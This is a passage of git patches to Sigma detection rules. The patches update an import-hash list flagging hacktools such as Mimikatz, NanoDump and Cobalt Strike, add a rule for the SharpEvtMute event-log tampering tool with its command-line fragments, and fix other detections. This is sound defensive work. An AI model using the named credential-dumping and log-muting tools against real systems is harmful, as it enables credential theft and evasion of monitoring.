a/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml +++ b/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml @@ -4,183 +4,189 @@ description: Detects the use of Windows hacktools based on their import hash (im status: experimental author: Florian Roth references: - - Internal Research + - Internal Research date: 2022/03/04 -modified: 2022/08/20 +modified: 2022/09/07 logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection: - - Imphash: - - bcca3c247b619dcd13c8cdff5f123932 # PetitPotam - - 3a19059bd7688cb88e70005f18efc439 # PetitPotam - - bf6223a49e45d99094406777eb6004ba # PetitPotam - - 0c106686a31bfe2ba931ae1cf6e9dbc6 # Mimikatz - - 0d1447d4b3259b3c2a1d4cfb7ece13c3 # Mimikatz - - 1b0369a1e06271833f78ffa70ffb4eaf # Mimikatz - - 4c1b52a19748428e51b14c278d0f58e3 # Mimikatz - - 4d927a711f77d62cebd4f322cb57ec6f # Mimikatz - - 66ee036df5fc1004d9ed5e9a94a1086a # Mimikatz - - 672b13f4a0b6f27d29065123fe882dfc # Mimikatz - - 6bbd59cea665c4afcc2814c1327ec91f # Mimikatz - - 725bb81dc24214f6ecacc0cfb36ad30d # Mimikatz - - 9528a0e91e28fbb88ad433feabca2456 # Mimikatz - - 9da6d5d77be11712527dcab86df449a3 # Mimikatz - - a6e01bc1ab89f8d91d9eab72032aae88 # Mimikatz - - b24c5eddaea4fe50c6a96a2a133521e4 # Mimikatz - - d21bbc50dcc169d7b4d0f01962793154 # Mimikatz - - fcc251cceae90d22c392215cc9a2d5d6 # Mimikatz - - 23867a89c2b8fc733be6cf5ef902f2d1 # JuicyPotato - - a37ff327f8d48e8a4d2f757e1b6e70bc # JuicyPotato - - 6118619783fc175bc7ebecff0769b46e # RoguePotato - - 959a83047e80ab68b368fdb3f4c6e4ea # RoguePotato - - 563233bfa169acc7892451f71ad5850a # RoguePotato - - 87575cb7a0e0700eb37f2e3668671a08 # RoguePotato - - 13f08707f759af6003837a150a371ba1 # Pwdump - - 1781f06048a7e58b323f0b9259be798b # Pwdump - - 233f85f2d4bc9d6521a6caae11a1e7f5 # Pwdump - - 24af2584cbf4d60bbe5c6d1b31b3be6d # Pwdump - - 632969ddf6dbf4e0f53424b75e4b91f2 # Pwdump - - 713c29b396b907ed71a72482759ed757 # Pwdump - - 749a7bb1f0b4c4455949c0b2bf7f9e9f # Pwdump - - 8628b2608957a6b0c6330ac3de28ce2e # Pwdump - - 8b114550386e31895dfab371e741123d # Pwdump - - 94cb940a1a6b65bed4d5a8f849ce9793 # PwDumpX - - 9d68781980370e00e0bd939ee5e6c141 # Pwdump - - b18a1401ff8f444056d29450fbc0a6ce # Pwdump - - cb567f9498452721d77a451374955f5f # Pwdump - - 730073214094cd328547bf1f72289752 # Htran - - 17b461a082950fc6332228572138b80c # Cobalt Strike beacons - - dc25ee78e2ef4d36faa0badf1e7461c9 # Cobalt Strike beacons - - 819b19d53ca6736448f9325a85736792 # Cobalt Strike beacons - - 829da329ce140d873b4a8bde2cbfaa7e # Cobalt Strike beacons - - c547f2e66061a8dffb6f5a3ff63c0a74 # PPLDump - - 0588081ab0e63ba785938467e1b10cca # PPLDump - - 0d9ec08bac6c07d9987dfd0f1506587c # NanoDump - - bc129092b71c89b4d4c8cdf8ea590b29 # NanoDump - - 4da924cf622d039d58bce71cdf05d242 # NanoDump - - e7a3a5c377e2d29324093377d7db1c66 # NanoDump - - 9a9dbec5c62f0380b4fa5fd31deffedf # NanoDump - - af8a3976ad71e5d5fdfb67ddb8dadfce # NanoDump - - 0c477898bbf137bbd6f2a54e3b805ff4 # NanoDump - - 0ca9f02b537bcea20d4ea5eb1a9fe338 # NanoDump - - 3ab3655e5a14d4eefc547f4781bf7f9e # NanoDump - - e6f9d5152da699934b30daab206471f6 # NanoDump - - 3ad59991ccf1d67339b319b15a41b35d # NanoDump - - ffdd59e0318b85a3e480874d9796d872 # NanoDump - - 0cf479628d7cc1ea25ec7998a92f5051 # NanoDump - - 07a2d4dcbd6cb2c6a45e6b101f0b6d51 # NanoDump - - d6d0f80386e1380d05cb78e871bc72b1 # NanoDump - - 38d9e015591bbfd4929e0d0f47fa0055 # HandleKatz - - 0e2216679ca6e1094d63322e3412d650 # HandleKatz - - ada161bf41b8e5e9132858cb54cab5fb # DripLoader - - 2a1bc4913cd5ecb0434df07cb675b798 # DripLoader - - 11083e75553baae21dc89ce8f9a195e4 # DripLoader - - a23d29c9e566f2fa8ffbb79267f5df80 # DripLoader - - 4a07f944a83e8a7c2525efa35dd30e2f # CreateMiniDump - - 767637c23bb42cd5d7397cf58b0be688 # UACMe Akagi - - 14c4e4c72ba075e9069ee67f39188ad8 # UACMe Akagi - - 3c782813d4afce07bbfc5a9772acdbdc # UACMe Akagi - - 7d010c6bb6a3726f327f7e239166d127 # UACMe Akagi - - 89159ba4dd04e4ce5559f132a9964eb3 # UACMe Akagi - - 6f33f4a5fc42b8cec7314947bd13f30f # UACMe Akagi - - 5834ed4291bdeb928270428ebbaf7604 # UACMe Akagi - - 5a8a8a43f25485e7ee1b201edcbc7a38 # UACMe Akagi - - dc7d30b90b2d8abf664fbed2b1b59894 # UACMe Akagi - - 41923ea1f824fe63ea5beb84db7a3e74 # UACMe Akagi - - 3de09703c8e79ed2ca3f01074719906b # UACMe Akagi - - a53a02b997935fd8eedcb5f7abab9b9f # WCE - - e96a73c7bf33a464c510ede582318bf2 # WCE - - 32089b8851bbf8bc2d014e9f37288c83 # Sliver Stagers - - 09D278F9DE118EF09163C6140255C690 # Dumpert - - 03866661686829d806989e2fc5a72606 # Dumpert - - e57401fbdadcd4571ff385ab82bd5d6d # Dumpert - - Hashes|contains: # Sysmon field hashes contains all types - - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam - - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam - - IMPHASH=bf6223a49e45d99094406777eb6004ba # PetitPotam - - IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6 # Mimikatz - - IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3 # Mimikatz - - IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF # Mimikatz - - IMPHASH=4C1B52A19748428E51B14C278D0F58E3 # Mimikatz - - IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F # Mimikatz - - IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A # Mimikatz - - IMPHASH=672B13F4A0B6F27D29065123FE882DFC # Mimikatz - - IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F # Mimikatz - - IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D # Mimikatz - - IMPHASH=9528A0E91E28FBB88AD433FEABCA2456 # Mimikatz - - IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3 # Mimikatz - - IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88 # Mimikatz - - IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4 # Mimikatz - - IMPHASH=D21BBC50DCC169D7B4D0F01962793154 # Mimikatz - - IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6 # Mimikatz - - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 # JuicyPotato - - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC # JuicyPotato - - IMPHASH=6118619783FC175BC7EBECFF0769B46E # RoguePotato - - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA # RoguePotato - - IMPHASH=563233BFA169ACC7892451F71AD5850A # RoguePotato - - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 # RoguePotato - - IMPHASH=13F08707F759AF6003837A150A371BA1 # Pwdump - - IMPHASH=1781F06048A7E58B323F0B9259BE798B # Pwdump - - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 # Pwdump - - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D # Pwdump - - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 # Pwdump - - IMPHASH=713C29B396B907ED71A72482759ED757 # Pwdump - - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F # Pwdump - - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E # Pwdump - - IMPHASH=8B114550386E31895DFAB371E741123D # Pwdump - - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 # PwDumpX - - IMPHASH=9D68781980370E00E0BD939EE5E6C141 # Pwdump - - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE # Pwdump - - IMPHASH=CB567F9498452721D77A451374955F5F # Pwdump - - IMPHASH=730073214094CD328547BF1F72289752 # Htran - - IMPHASH=17B461A082950FC6332228572138B80C # Cobalt Strike beacons - - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 # Cobalt Strike beacons - - IMPHASH=819B19D53CA6736448F9325A85736792 # Cobalt Strike beacons - - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E # Cobalt Strike beacons - - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 # PPLDump - - IMPHASH=0588081AB0E63BA785938467E1B10CCA # PPLDump - - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C # NanoDump - - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 # NanoDump - - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 # NanoDump - - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 # NanoDump - - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF # NanoDump - - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE # NanoDump - - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 # NanoDump - - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 # NanoDump - - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E # NanoDump - - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 # NanoDump - - IMPHASH=3AD59991CCF1D67339B319B15A41B35D # NanoDump - - IMPHASH=FFDD59E0318B85A3E480874D9796D872 # NanoDump - - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 # NanoDump - - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 # NanoDump - - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 # NanoDump - - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 # HandleKatz - - IMPHASH=0E2216679CA6E1094D63322E3412D650 # HandleKatz - - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB # DripLoader - - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader - - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader - - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader - - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F # CreateMiniDump - - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 # UACMe Akagi - - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 # UACMe Akagi - - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC # UACMe Akagi - - IMPHASH=7D010C6BB6A3726F327F7E239166D127 # UACMe Akagi - - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 # UACMe Akagi - - IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F # UACMe Akagi - - IMPHASH=5834ED4291BDEB928270428EBBAF7604 # UACMe Akagi - - IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 # UACMe Akagi - - IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 # UACMe Akagi - - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 # UACMe Akagi - - IMPHASH=3DE09703C8E79ED2CA3F01074719906B # UACMe Akagi - - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F # WCE - - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 # WCE - - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 # Sliver Stagers - - IMPHASH=09D278F9DE118EF09163C6140255C690 # Dumpert - - IMPHASH=03866661686829d806989e2fc5a72606 # Dumpert - - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d # Dumpert - condition: selection + selection: + - Imphash: + - bcca3c247b619dcd13c8cdff5f123932 # PetitPotam + - 3a19059bd7688cb88e70005f18efc439 # PetitPotam + - bf6223a49e45d99094406777eb6004ba # PetitPotam + - 0c106686a31bfe2ba931ae1cf6e9dbc6 # Mimikatz + - 0d1447d4b3259b3c2a1d4cfb7ece13c3 # Mimikatz + - 1b0369a1e06271833f78ffa70ffb4eaf # Mimikatz + - 4c1b52a19748428e51b14c278d0f58e3 # Mimikatz + - 4d927a711f77d62cebd4f322cb57ec6f # Mimikatz + - 66ee036df5fc1004d9ed5e9a94a1086a # Mimikatz + - 672b13f4a0b6f27d29065123fe882dfc # Mimikatz + - 6bbd59cea665c4afcc2814c1327ec91f # Mimikatz + - 725bb81dc24214f6ecacc0cfb36ad30d # Mimikatz + - 9528a0e91e28fbb88ad433feabca2456 # Mimikatz + - 9da6d5d77be11712527dcab86df449a3 # Mimikatz + - a6e01bc1ab89f8d91d9eab72032aae88 # Mimikatz + - b24c5eddaea4fe50c6a96a2a133521e4 # Mimikatz + - d21bbc50dcc169d7b4d0f01962793154 # Mimikatz + - fcc251cceae90d22c392215cc9a2d5d6 # Mimikatz + - 23867a89c2b8fc733be6cf5ef902f2d1 # JuicyPotato + - a37ff327f8d48e8a4d2f757e1b6e70bc # JuicyPotato + - 6118619783fc175bc7ebecff0769b46e # RoguePotato + - 959a83047e80ab68b368fdb3f4c6e4ea # RoguePotato + - 563233bfa169acc7892451f71ad5850a # RoguePotato + - 87575cb7a0e0700eb37f2e3668671a08 # RoguePotato + - 13f08707f759af6003837a150a371ba1 # Pwdump + - 1781f06048a7e58b323f0b9259be798b # Pwdump + - 233f85f2d4bc9d6521a6caae11a1e7f5 # Pwdump + - 24af2584cbf4d60bbe5c6d1b31b3be6d # Pwdump + - 632969ddf6dbf4e0f53424b75e4b91f2 # Pwdump + - 713c29b396b907ed71a72482759ed757 # Pwdump + - 749a7bb1f0b4c4455949c0b2bf7f9e9f # Pwdump + - 8628b2608957a6b0c6330ac3de28ce2e # Pwdump + - 8b114550386e31895dfab371e741123d # Pwdump + - 94cb940a1a6b65bed4d5a8f849ce9793 # PwDumpX + - 9d68781980370e00e0bd939ee5e6c141 # Pwdump + - b18a1401ff8f444056d29450fbc0a6ce # Pwdump + - cb567f9498452721d77a451374955f5f # Pwdump + - 730073214094cd328547bf1f72289752 # Htran + - 17b461a082950fc6332228572138b80c # Cobalt Strike beacons + - dc25ee78e2ef4d36faa0badf1e7461c9 # Cobalt Strike beacons + - 819b19d53ca6736448f9325a85736792 # Cobalt Strike beacons + - 829da329ce140d873b4a8bde2cbfaa7e # Cobalt Strike beacons + - c547f2e66061a8dffb6f5a3ff63c0a74 # PPLDump + - 0588081ab0e63ba785938467e1b10cca # PPLDump + - 0d9ec08bac6c07d9987dfd0f1506587c # NanoDump + - bc129092b71c89b4d4c8cdf8ea590b29 # NanoDump + - 4da924cf622d039d58bce71cdf05d242 # NanoDump + - e7a3a5c377e2d29324093377d7db1c66 # NanoDump + - 9a9dbec5c62f0380b4fa5fd31deffedf # NanoDump + - af8a3976ad71e5d5fdfb67ddb8dadfce # NanoDump + - 0c477898bbf137bbd6f2a54e3b805ff4 # NanoDump + - 0ca9f02b537bcea20d4ea5eb1a9fe338 # NanoDump + - 3ab3655e5a14d4eefc547f4781bf7f9e # NanoDump + - e6f9d5152da699934b30daab206471f6 # NanoDump + - 3ad59991ccf1d67339b319b15a41b35d # NanoDump + - ffdd59e0318b85a3e480874d9796d872 # NanoDump + - 0cf479628d7cc1ea25ec7998a92f5051 # NanoDump + - 07a2d4dcbd6cb2c6a45e6b101f0b6d51 # NanoDump + - d6d0f80386e1380d05cb78e871bc72b1 # NanoDump + - 38d9e015591bbfd4929e0d0f47fa0055 # HandleKatz + - 0e2216679ca6e1094d63322e3412d650 # HandleKatz + - ada161bf41b8e5e9132858cb54cab5fb # DripLoader + - 2a1bc4913cd5ecb0434df07cb675b798 # DripLoader + - 11083e75553baae21dc89ce8f9a195e4 # DripLoader + - a23d29c9e566f2fa8ffbb79267f5df80 # DripLoader + - 4a07f944a83e8a7c2525efa35dd30e2f # CreateMiniDump + - 767637c23bb42cd5d7397cf58b0be688 # UACMe Akagi + - 14c4e4c72ba075e9069ee67f39188ad8 # UACMe Akagi + - 3c782813d4afce07bbfc5a9772acdbdc # UACMe Akagi + - 7d010c6bb6a3726f327f7e239166d127 # UACMe Akagi + - 89159ba4dd04e4ce5559f132a9964eb3 # UACMe Akagi + - 6f33f4a5fc42b8cec7314947bd13f30f # UACMe Akagi + - 5834ed4291bdeb928270428ebbaf7604 # UACMe Akagi + - 5a8a8a43f25485e7ee1b201edcbc7a38 # UACMe Akagi + - dc7d30b90b2d8abf664fbed2b1b59894 # UACMe Akagi + - 41923ea1f824fe63ea5beb84db7a3e74 # UACMe Akagi + - 3de09703c8e79ed2ca3f01074719906b # UACMe Akagi + - a53a02b997935fd8eedcb5f7abab9b9f # WCE + - e96a73c7bf33a464c510ede582318bf2 # WCE + - 32089b8851bbf8bc2d014e9f37288c83 # Sliver Stagers + - 09D278F9DE118EF09163C6140255C690 # Dumpert + - 03866661686829d806989e2fc5a72606 # Dumpert + - e57401fbdadcd4571ff385ab82bd5d6d # Dumpert + - 84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte + - 19584675d94829987952432e018d5056 # SysmonQuiet + - 330768a4f172e10acb6287b87289d83b # ShaprEvtMute Hook + - Hashes|contains: # Sysmon field hashes contains all types + - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam + - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam + - IMPHASH=bf6223a49e45d99094406777eb6004ba # PetitPotam + - IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6 # Mimikatz + - IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3 # Mimikatz + - IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF # Mimikatz + - IMPHASH=4C1B52A19748428E51B14C278D0F58E3 # Mimikatz + - IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F # Mimikatz + - IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A # Mimikatz + - IMPHASH=672B13F4A0B6F27D29065123FE882DFC # Mimikatz + - IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F # Mimikatz + - IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D # Mimikatz + - IMPHASH=9528A0E91E28FBB88AD433FEABCA2456 # Mimikatz + - IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3 # Mimikatz + - IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88 # Mimikatz + - IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4 # Mimikatz + - IMPHASH=D21BBC50DCC169D7B4D0F01962793154 # Mimikatz + - IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6 # Mimikatz + - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 # JuicyPotato + - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC # JuicyPotato + - IMPHASH=6118619783FC175BC7EBECFF0769B46E # RoguePotato + - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA # RoguePotato + - IMPHASH=563233BFA169ACC7892451F71AD5850A # RoguePotato + - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 # RoguePotato + - IMPHASH=13F08707F759AF6003837A150A371BA1 # Pwdump + - IMPHASH=1781F06048A7E58B323F0B9259BE798B # Pwdump + - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 # Pwdump + - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D # Pwdump + - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 # Pwdump + - IMPHASH=713C29B396B907ED71A72482759ED757 # Pwdump + - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F # Pwdump + - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E # Pwdump + - IMPHASH=8B114550386E31895DFAB371E741123D # Pwdump + - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 # PwDumpX + - IMPHASH=9D68781980370E00E0BD939EE5E6C141 # Pwdump + - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE # Pwdump + - IMPHASH=CB567F9498452721D77A451374955F5F # Pwdump + - IMPHASH=730073214094CD328547BF1F72289752 # Htran + - IMPHASH=17B461A082950FC6332228572138B80C # Cobalt Strike beacons + - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 # Cobalt Strike beacons + - IMPHASH=819B19D53CA6736448F9325A85736792 # Cobalt Strike beacons + - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E # Cobalt Strike beacons + - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 # PPLDump + - IMPHASH=0588081AB0E63BA785938467E1B10CCA # PPLDump + - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C # NanoDump + - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 # NanoDump + - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 # NanoDump + - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 # NanoDump + - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF # NanoDump + - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE # NanoDump + - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 # NanoDump + - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 # NanoDump + - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E # NanoDump + - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 # NanoDump + - IMPHASH=3AD59991CCF1D67339B319B15A41B35D # NanoDump + - IMPHASH=FFDD59E0318B85A3E480874D9796D872 # NanoDump + - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 # NanoDump + - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 # NanoDump + - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 # NanoDump + - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 # HandleKatz + - IMPHASH=0E2216679CA6E1094D63322E3412D650 # HandleKatz + - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB # DripLoader + - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader + - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader + - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader + - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F # CreateMiniDump + - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 # UACMe Akagi + - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 # UACMe Akagi + - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC # UACMe Akagi + - IMPHASH=7D010C6BB6A3726F327F7E239166D127 # UACMe Akagi + - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 # UACMe Akagi + - IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F # UACMe Akagi + - IMPHASH=5834ED4291BDEB928270428EBBAF7604 # UACMe Akagi + - IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 # UACMe Akagi + - IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 # UACMe Akagi + - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 # UACMe Akagi + - IMPHASH=3DE09703C8E79ED2CA3F01074719906B # UACMe Akagi + - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F # WCE + - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 # WCE + - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 # Sliver Stagers + - IMPHASH=09D278F9DE118EF09163C6140255C690 # Dumpert + - IMPHASH=03866661686829d806989e2fc5a72606 # Dumpert + - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d # Dumpert + - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte + - IMPHASH=19584675D94829987952432E018D5056 # SysmonQuiet + - IMPHASH=330768A4F172E10ACB6287B87289D83B # ShaprEvtMute Hook + condition: selection falsepositives: - - Legitimate use of one of these tools -level: high \ No newline at end of file + - Legitimate use of one of these tools +level: high From a69d256367f8ef0f72341932d738f7ed7a77928b Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 7 Sep 2022 16:33:52 +0200 Subject: [PATCH 33/73] rule: SharpEvtMute --- ...eation_win_sysmon_disable_sharpevtmute.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml diff --git a/rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml b/rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml new file mode 100644 index 000000000..878656d6a --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml @@ -0,0 +1,25 @@ +title: SharpEvtMute EvtMuteHook Load +id: bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c +status: experimental +description: Detects the use of SharpEvtHook, a tool to tamper with Windows event logs +references: + - https://github.com/bats3c/EvtMute +author: Florian Roth +date: 2022/09/07 +tags: + - attack.defense_evasion + - attack.t1562.002 +logsource: + product: windows + category: process_creation +detection: + selection: + - Image|endswith: '\SharpEvtMute.exe' + - Description: 'SharpEvtMute' + - CommandLine|contains: + - '--Filter "rule ' + - '--Encoded --Filter \"' + condition: selection +falsepositives: + - Unknown +level: high From 1641f4590a27cae4e236ddfb94bdd2efc78424d6 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 7 Sep 2022 17:12:12 +0200 Subject: [PATCH 34/73] fix: duplicate UUIDs --- .../image_load/image_load_sysmon_disable_sharpevtmute.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml b/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml index 8c3617ae1..e9f0a45d6 100644 --- a/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml +++ b/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml @@ -1,5 +1,5 @@ title: SharpEvtMute EvtMuteHook Load -id: bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c +id: 49329257-089d-46e6-af37-4afce4290685 status: experimental description: Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool to tamper with Windows event logs references: From b70ac176760e3ac9768ecae1bcd17f994e3a86f0 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 7 Sep 2022 21:58:22 +0200 Subject: [PATCH 35/73] Fix --- .../create_stream_hash_susp_ip_domains.yml | 20 +++++++++---------- .../proc_creation_win_system_exe_anomaly.yml | 2 +- 2 files changed, 11 insertions(+), 11 deletions(-) diff --git a/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml b/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml index fb83898d4..8e5e50eae 100644 --- a/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml +++ b/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the download of suspicious file type from URLs with IP author: Nasreddine Bencherchali references: - - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015 + - https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md date: 2022/09/07 logsource: product: windows @@ -12,15 +12,15 @@ logsource: detection: selection_domain: Contents|contains: - - '1.' - - '2.' - - '3.' - - '4.' - - '5.' - - '6.' - - '7.' - - '8.' - - '9.' + - '://1' + - '://2' + - '://3' + - '://4' + - '://5' + - '://6' + - '://7' + - '://8' + - '://9' selection_extension: TargetFilename|contains: - '.ps1:Zone' diff --git a/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml b/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml index fbc66ccbf..e9ec591cf 100644 --- a/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml +++ b/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/GelosSnake/status/934900723426439170 author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali date: 2017/11/27 -modified: 2022/07/14 +modified: 2022/09/07 tags: - attack.defense_evasion - attack.t1036 From baf603bb5c3cdd95b1f759ccd3c3e717854d534c Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Thu, 8 Sep 2022 10:24:27 +0200 Subject: [PATCH 36/73] Fix FP in testing --- .../registry_set/registry_set_disable_winevt_logging.yml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml index a0d67a125..04c010857 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml @@ -3,7 +3,7 @@ id: 2f78da12-f7c7-430b-8b19-a28f269b77a3 description: Detects tempering with the "Enabled" registry key in order to disable windows logging of a windows event channel author: frack113, Nasreddine Bencherchali date: 2022/07/04 -modified: 2022/08/26 +modified: 2022/09/08 status: experimental references: - https://twitter.com/WhichbufferArda/status/1543900539280293889 @@ -27,6 +27,10 